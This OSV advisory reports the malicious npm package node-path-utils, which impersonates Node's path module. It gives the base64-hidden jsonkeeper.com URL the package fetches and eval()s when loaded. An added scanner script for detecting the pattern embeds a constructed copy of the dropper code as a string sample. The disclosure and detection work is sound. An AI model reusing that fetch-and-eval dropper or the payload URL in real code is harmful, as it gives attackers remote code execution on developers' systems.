MAL-2026-5985

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-path-utils/MAL-2026-5985.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5985
Published
2026-06-17T04:20:30Z
Modified
2026-06-17T06:02:04.405007554Z
Summary
Malicious code in node-path-utils (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (180db640dc8207694eb4629834f74b740d7efc9febf26067d190e10656fe04e9)

The package node-path-utils describes itself in its README and package description as 'an exact copy of the NodeJS path module', impersonating the Node.js core path library to lure developers into installing it.

On require() of the main entry (path.js), a top-level IIFE calls loadTokenData(), which decodes a base64-encoded URL (aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9QMENORA==, which decodes to https://www.jsonkeeper.com/b/P0CND), fetch()es it, and passes the content field of the response JSON directly to eval(). jsonkeeper.com is a free, mutable JSON-paste service: whoever controls the paste can swap the served code at any time, so arbitrary attacker-controlled JavaScript runs in the consumer's Node process on every import.

Additionally, path.js does require('mddriver') at module top level, with mddriver declared as "*" in dependencies: an unused, unpinned third-party package pulled into the installer's process at import, providing a second vector for smuggling attacker code in through the transitive dependency.

The combination of stdlib impersonation, a base64-obfuscated remote fetch, eval of content from a mutable paste host, and an unused wildcard-ranged sidecar dependency is an unambiguous remote-code-execution dropper.
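Every signal in that description is visible in the package source without executing it, so the pattern can be caught statically before the package is ever required. The following is an added example written for this page, not code from the advisory, from Amazon Inspector, or from the package itself: the package.json and path.js texts inside it are constructed stand-ins shaped like the description (the base64 literal is the one quoted above), the core-module list is an assumed subset, and the heuristics are illustrative rather than a complete detector.

```javascript
// Added example, not code from the advisory or the package: static heuristics for
// the dropper pattern described above (base64-hidden URL, fetch() feeding eval(),
// import-time IIFE, a wildcard sidecar dependency that is required but never used,
// and a description claiming to be a copy of a Node core module). Inputs are
// analysed as text only; nothing is executed or fetched.

// CONSTRUCTED stand-ins shaped like the advisory's description of package.json
// and path.js. The base64 literal is the one quoted in the advisory.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'node-path-utils',
  version: '1.23.2',
  description: 'an exact copy of the NodeJS path module',
  main: 'path.js',
  dependencies: { mddriver: '*' },
});
const SAMPLE_PATH_JS = `
const mddriver = require('mddriver');
(async function () { await loadTokenData(); })();
async function loadTokenData() {
  const url = Buffer.from('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9QMENORA==', 'base64').toString();
  const res = await fetch(url);
  eval((await res.json()).content);
}
`;

// Assumed subset of Node core module names a typosquat is likely to impersonate
// (require('module').builtinModules gives the full list at runtime).
const CORE_MODULES = ['path', 'fs', 'crypto', 'http', 'https', 'os', 'util',
  'url', 'events', 'stream', 'child_process', 'zlib'];

// Base64 string literals that decode to an http(s) URL.
function findBase64Urls(src) {
  const out = [];
  const re = /['"]([A-Za-z0-9+/]{16,}={0,2})['"]/g;
  for (let m; (m = re.exec(src)); ) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^https?:\/\/\S+$/.test(decoded)) out.push({ encoded: m[1], decoded });
  }
  return out;
}

// Dynamic code execution in a file that also performs a network fetch.
function hasRemoteEval(src) {
  const execs = /\b(eval|new\s+Function|vm\.runIn\w*Context)\s*\(/.test(src);
  const network = /\b(fetch|https?\.get|https?\.request)\s*\(/.test(src);
  return execs && network;
}

// Code that runs at import time: a function-style IIFE starting a line.
function hasTopLevelIife(src) {
  return /^\s*\(\s*(async\s+)?function\b/m.test(src);
}

// Dependencies whose range accepts whatever the registry serves next.
function findWildcardDeps(pkg) {
  const deps = { ...(pkg.dependencies || {}), ...(pkg.optionalDependencies || {}) };
  return Object.keys(deps).filter((n) => ['*', '', 'latest', 'x'].includes(String(deps[n]).trim()));
}

// require()d modules whose binding is never referenced after the declaration.
function findUnusedRequires(src) {
  const out = [];
  const re = /(?:const|let|var)\s+(\w+)\s*=\s*require\(\s*['"]([^'"]+)['"]\s*\)/g;
  for (let m; (m = re.exec(src)); ) {
    const rest = src.replace(m[0], '');
    if (!new RegExp(`\\b${m[1]}\\b`).test(rest)) out.push(m[2]);
  }
  return out;
}

// A description that calls the package a copy of a core module.
function findStdlibImpersonation(pkg) {
  const desc = (pkg.description || '').toLowerCase();
  if (!/\bcopy of\b/.test(desc)) return [];
  return CORE_MODULES.filter((mod) => new RegExp(`\\b${mod}\\s+module\\b`).test(desc));
}

function scanPackage(packageJsonText, mainSource) {
  const pkg = JSON.parse(packageJsonText);
  const r = {
    base64Urls: findBase64Urls(mainSource),
    remoteEval: hasRemoteEval(mainSource),
    topLevelIife: hasTopLevelIife(mainSource),
    wildcardDeps: findWildcardDeps(pkg),
    unusedRequires: findUnusedRequires(mainSource),
    impersonates: findStdlibImpersonation(pkg),
  };
  // Remote eval is damning on its own; the other signals corroborate.
  r.suspicious = r.remoteEval || (r.base64Urls.length > 0 && r.topLevelIife);
  return r;
}

const report = scanPackage(SAMPLE_PACKAGE_JSON, SAMPLE_PATH_JS);
console.log(JSON.stringify(report, null, 2));
```

Run it with node; it prints a report for the constructed sample. To inspect a real tarball, extract it and pass the text of package.json and of the file named in its main field: the inputs are only ever treated as strings, so scanning this way does not trigger the IIFE, which fires only on require().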

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "180db640dc8207694eb4629834f74b740d7efc9febf26067d190e10656fe04e9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-17T04:20:30Z",
            "versions": [
                "1.23.2"
            ],
            "id": "IN-MAL-2026-006880",
            "import_time": "2026-06-17T05:45:41.991284706Z"
        }
    ]
}
References
Credits

Affected packages

npm / node-path-utils

Package: node-path-utils (npm)
Affected ranges: 1.*
Affected versions: 1.23.2

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-path-utils/MAL-2026-5985.json"
indicators
{
    "evidence_files": [
        {
            "sha256": "275628b95a69767953c674b4367b8547265c39c1d40d460e9d29e80685999a3c",
            "tlsh": "48828444594661599a3777b0df0a340ef77684f34215ab00f89cea502f72e78a2feed8",
            "path": "path.js"
        },
        {
            "sha256": "f41e67088d05fb2b7f35cbad49a766d326dced0605a7186eaf39aa8cdc057873",
            "tlsh": "e7e0ab109f51ad3312ea136a9d2c40577360cecf0514bc0023ca0aac968e4bba6f228c",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-iU+w0cRqYcmoH8ZnqMJkSHliff9zYoOMMtisJMFRsNTvYHqcUFINWMoCSazSWv607G4OS8glwITFyIkFuAJEFg==",
                "sha1": "a748e95bcb154a75df422d85ea4a4013d6d0d4d8"
            },
            "filename": "node-path-utils-1.23.2.tgz"
        }
    ]
}